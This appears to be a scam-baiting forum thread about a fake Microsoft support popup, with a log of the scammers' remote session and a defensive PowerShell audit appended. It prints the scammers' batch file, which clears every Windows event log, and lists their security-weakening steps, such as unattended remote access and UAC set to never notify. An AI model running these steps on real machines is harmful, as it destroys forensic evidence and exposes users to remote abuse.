Microsoft Popup Scam +1-(855)-949-0471

Link: https://domain343698.online/768/483957629/errorlist/093958356/7352305285/errorreport/x00EdsjsjhsOkhkasdVX0/

Appears to be a working number of an Indian tech support call center.

Thanks for the number! This was my first longer scam bait call, and I could keep them busy for more than one hour with a TextNow number :) I said I was a farmer and got a new computer just last week. They did the usual thing with "tree" and then even created an email account and a PayPal account for me.

Then they tried to send money with my credit card, a $1 burner card I bought somewhere on the internet, and surprisingly it didn't work. So they forwarded me to the page microsofttechs.com and entered all my fake address data and credit card number into it, I guess for some other processing method. Screenshot:
https://i.imgur.com/E08m7T3.png
Now they are on my VM and wasting more time with all the "security fixes"; they said they will need 30-45 minutes. I'm recording a video of it. But what they do looks half decent, installing an ad blocker etc. Of course, it's still a scam how they get their customers, and I should pay $325, outrageous! :-)

@marilynbaiter#121827 always try to find out as much as possible such as their company websites, their company name etc. That was a good bait!

Will try to get more information next time, I was a bit nervous. They are done now on my VM. They said they will disconnect, we said goodbye and the phone call ended, but these scammers were still on my VM! I pretended to read some news for minutes, while they were happily watching. Then I disconnected it from my side.

The video of everything they did is encoding now, will upload it later. They installed a few freeware programs, cleaned temporary files, and installed their number in the taskbar. At one point they even ejected my Oracle VM Guest Additions CD, oops :-)

They sent a "medicine2.txt" file to my desktop at the end and showed me 2 more numbers: 1888-604-3357 and 1800-291-7147. But these might only work for registered customers. I guess the "lifetime" support lasts only until they disable the toll free numbers. Contents of the medicine file, with an email contact, which might provide more information about their company, geekswebllc.com:

* All the securities and updates have been installed, its up to date.
* Your Computer is working fine and faster then before.
* Our working hours are 10:00 AM to 08:00 PM CST.
* We work from Monday to Friday. We are off on Saturday and Sunday.
* If you face any issue on weekends then you could mail us on [email protected]
* Your computer will be under observation for a week so that you dont face any issue in future.
* If you`re not satisfied with the work then you are requested to call us and ask for refund.
* Our toll free number is 1888-604-3357 / 1800-291-7147.
* You`ll be getting a call for feedback from Manager within next 24 to 48 hours.

Here is the video of what they did:

https://www.youtube.com/watch?v=uRX1wgNdkcI

I would say it is better than grandson quality :-) but they probably wouldn't know what to do if there were a real problem and not just their fake popup. And I didn't notice it the first time, but they uninstalled TeamViewer! I installed it together with some other programs from https://ninite.com to make the VM look a bit more legit. I guess they don't want other scammers who use TeamViewer getting on my computer. And they told me if I see this popup again, I should only call their number, not the number on the popup :-)

I still have the VM. Let me know if someone wants some of the other files they transferred before I reset it to the last checkpoint. They want to call me again tomorrow, they will probably complain about the credit card. Anything more I could do?

This is the content of the "Network Security" batch file:

    @echo off
    REM Admin check: bcdedit prints "Access is denied" when the script is not elevated
    FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
    IF (%adminTest%)==(Access) goto noAdmin
    REM Enumerates every Windows event log and clears each one (wipes the forensic trail)
    for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
    echo.
    REM Script bug: this only prints the text "goto theEnd", so execution falls
    REM through :do_clear once more with an empty argument before goto :eof ends it
    echo goto theEnd
    :do_clear
    echo clearing %1
    wevtutil.exe cl %1
    goto :eof
    :noAdmin
    exit

Their alternate # 800-642-3079 (as seen on microsofttechs.com)

Good news, a good Samaritan hacked their VM 800-642-3079

I did the work and reviewed my video in detail, to see what they did. TL;DR: except for installing the popup and ad blocker and removing some temporary files, they didn't do anything useful, and many things were even harmful and intended to lower the security of the computer and to make future scams easier. Definitely not worth the requested $325. So I take it back, it was less than grandson quality. But if someone doesn't know much about computers, it might look impressive.

Detailed log:

- downloading https://www.supremocontrol.com/public/download/Supremo.exe
- changing the User Account Control settings to "Never notify" (not recommended)
- installing Supremo and setting up unattended remote access, so that they can log in whenever they want without me noticing
- installing the "Popup Blocker Pro" extension in Chrome
- disabling the following programs, which I installed, from starting on the next boot: Avira (antivirus), Microsoft OneDrive, Spotify, VirtualBox Guest Additions (oops)
- changing the mouse speed to the fastest possible (what the heck?!)
- disabling all services, except "GoToAssist Remote Support", "Supremo" and the Avira services
- changing the screensaver: from the default, turn off after 10 minutes, to turn off never (hmm, they are not very green people)
- removing the SmartScreen warning message (a Microsoft feature that warns about running unrecognized apps downloaded from the internet)
- restoring the default folder options (probably to avoid that I see file extensions, which I usually enable in my Windows installations)
- disabling all Windows Security and Maintenance messages (that's another way to solve problems: if I don't see them, then there are no problems, cool)
- changing Internet Properties: selecting "Always open pop-ups in a new tab" and disabling the Pop-up Blocker (why would they do this, but install a popup blocker in Chrome? Dumb)
- looking at my system information (4 GB RAM) and then changing the paging file size from automatic to 4 GB min. and 8 GB max. in the system settings
- uninstalling TeamViewer, which I installed
- terminating the TeamViewer task in the Task Manager, to be sure nobody else is on my computer (they were using GoToAssist)
- finally terminating the Microsoft Edge browser with the Task Manager, which showed the scam popup
- removing their support phone number from the taskbar
- creating a new taskbar entry, which shows their support phone number (was the same, stupid guy, just following a script)
- downloading and installing Adblock Plus
- removing all my pending downloads in the Microsoft Store (which Microsoft starts on its own, I didn't start them, garbage like Candy Crush etc.)
- deleting temporary files
- ejecting the Oracle VirtualBox Guest Additions CD (oops)
- starting Internet Explorer, selecting "Don't use recommended settings" for the security setting, instead of the other option "SmartScreen"
- installing Adblock Plus again
- deleting more temporary files
- starting "ping google.com -t", so that it pings google.com continuously in a command shell (I guess to make it look more techy. This was at minute 25 in the video)
- changing the tablet mode setting from "Always ask me before switching" to "Don't ask me and don't switch" (maybe this is done to generate more support calls, if this switching doesn't work)
- changing the tablet mode setting from "Use the appropriate mode for my hardware" to "Use desktop mode"

It went on a bit slow from this point on, maybe he was getting some coffee.

- transferring the following files from his PC to my PC with GoToAssist: Cleanup.exe, Medicine2.txt, Security.bat, Cleanup.exe again, because he messed up the upload directory
- starting Cleanup.exe. It deletes a lot more temporary files and needed 7 minutes, while he restored and minimized the ping window and task manager
- running the Security.bat file as admin, which apparently deleted some more files or registry entries, needed about 2 minutes
- doing nothing for like 15 minutes, but CPU usage in the task manager was spiking to 100% after some time for a minute, maybe they did something in the background which was not recorded?
- again after 10 minutes, minute 52 in the video, I got called and the guy showed me the Medicine2.txt file

At minute 55 we said goodbye and the telephone call was ended, but he was still connected with GoToAssist, spying on what I was doing! I was pretending to surf the web for 5 minutes, no disconnect, finally I disconnected GoToAssist.

I did restart the VM after this, and as expected, the Avira antivirus main program was not running anymore. But some Avira services were still running. Maybe there will be no updates without the main program.
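As an added example (not from this thread or any of the posters), here is a PowerShell audit that checks a Windows 10 host for the weakening changes in the detailed log above (UAC "Never notify", SmartScreen off, hidden file extensions, startup entries disabled, unattended remote-access services) and for the event-log clearing that the Security.bat file performs. It assumes an elevated session; the name patterns used to spot Supremo and GoToAssist services are assumptions, the registry values and event IDs are documented Windows ones.

```powershell
# Added example, not from the thread. Run in an elevated PowerShell session.
function Get-ScamCleanupFindings {
    $findings = @()

    # UAC slider at "Never notify": admin consent prompt off and secure desktop off
    $uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    if ($uac.ConsentPromptBehaviorAdmin -eq 0 -and $uac.PromptOnSecureDesktop -eq 0) {
        $findings += 'UAC is set to "Never notify"'
    }

    # SmartScreen for downloaded apps switched off ("Off" instead of "Warn"/"Block")
    $exp = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer'
    if ($exp.SmartScreenEnabled -eq 'Off') { $findings += 'SmartScreen is Off' }

    # Folder options reset to default: known file extensions hidden again
    $adv = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    if ($adv.HideFileExt -eq 1) { $findings += 'Known file extensions are hidden' }

    # Remote-access tools left behind as services (unattended access).
    # Assumption: the service name or binary path contains the product name.
    Get-CimInstance Win32_Service |
        Where-Object { ($_.Name + $_.PathName) -match 'Supremo|GoToAssist' } |
        ForEach-Object { $findings += "Remote-access service: $($_.Name) start=$($_.StartMode)" }

    # Startup items disabled via Task Manager: StartupApproved\Run values whose
    # first byte is 3 (2 means enabled), for the current user and the machine
    foreach ($sa in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run',
                    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run') {
        if (-not (Test-Path $sa)) { continue }
        foreach ($name in (Get-Item $sa).Property) {
            $bytes = (Get-ItemProperty $sa -Name $name).$name
            if ($bytes[0] -eq 3) { $findings += "Startup entry disabled: $name" }
        }
    }

    # Event logs cleared (the Security.bat effect): 1102 in Security,
    # 104 from the Microsoft-Windows-Eventlog provider in System
    $cleared = @(Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1102} -ErrorAction SilentlyContinue) +
               @(Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Microsoft-Windows-Eventlog'; Id=104} -ErrorAction SilentlyContinue)
    foreach ($e in $cleared) { $findings += "Log cleared at $($e.TimeCreated): $($e.LogName)" }

    return $findings
}

Get-ScamCleanupFindings | ForEach-Object { Write-Output "[!] $_" }
```

An empty result means none of the listed changes are present; each finding names the setting or service to put back, and a cleared-log finding means the local event history before that timestamp is gone.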